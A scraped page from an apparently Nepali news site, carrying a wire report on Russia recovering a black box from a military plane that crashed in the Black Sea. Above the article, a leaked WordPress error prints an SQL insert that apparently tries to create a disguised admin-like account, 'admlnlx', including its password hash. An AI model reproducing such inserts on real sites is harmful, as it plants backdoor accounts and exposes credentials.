WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BKB/zRfnRvSUliX7dEpdhjtZYaXQbG/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 08:34:38', '', 'admlnlx', 'admlnlx')
रसिया, पुस १२–
रसियाली रक्षा मन्त्रालयले आइतबार ब्ल्याक सीमा दुर्घटनाग्रसत सैनिक विमानको उडानका समयमा गतिविधि रेकर्डलाई सुरक्षीत गर्ने ‘ब्ल्याक बक्स’ मङ्गलबार बिहान भेटिएको बताएको छ ।
आइतबार रसियाबाट सिरियाका लागि ९२ यात्रुसहित उडेको विमान ब्ल्याक सीमा विस्फोट भएको र विमानमा यात्रारत सबै यात्रुको जीवित पाउने आसा नपाइएको रसियाले जनाएको छ ।
विमानको एउटा ब्ल्याक बक्स खासै नबिग्रिएको अवस्थामा समुद्रको सतहबाट करिब दुई किलोमिटर टाढा पानीभित्र भेटिएको जनाएको छ ।
मङ्गलबार रक्षा मन्त्रालयद्वारा एक विज्ञप्ति जारी गरी ‘फ्लाइट डाटा रेकर्डर’ लाई मस्कोस्थित मन्त्रालयको ल्याबमा ल्याइएको बताउँदै रेकर्डरमा खासै क्षति नपुगेको बताएको छ । –रासस/एएफपी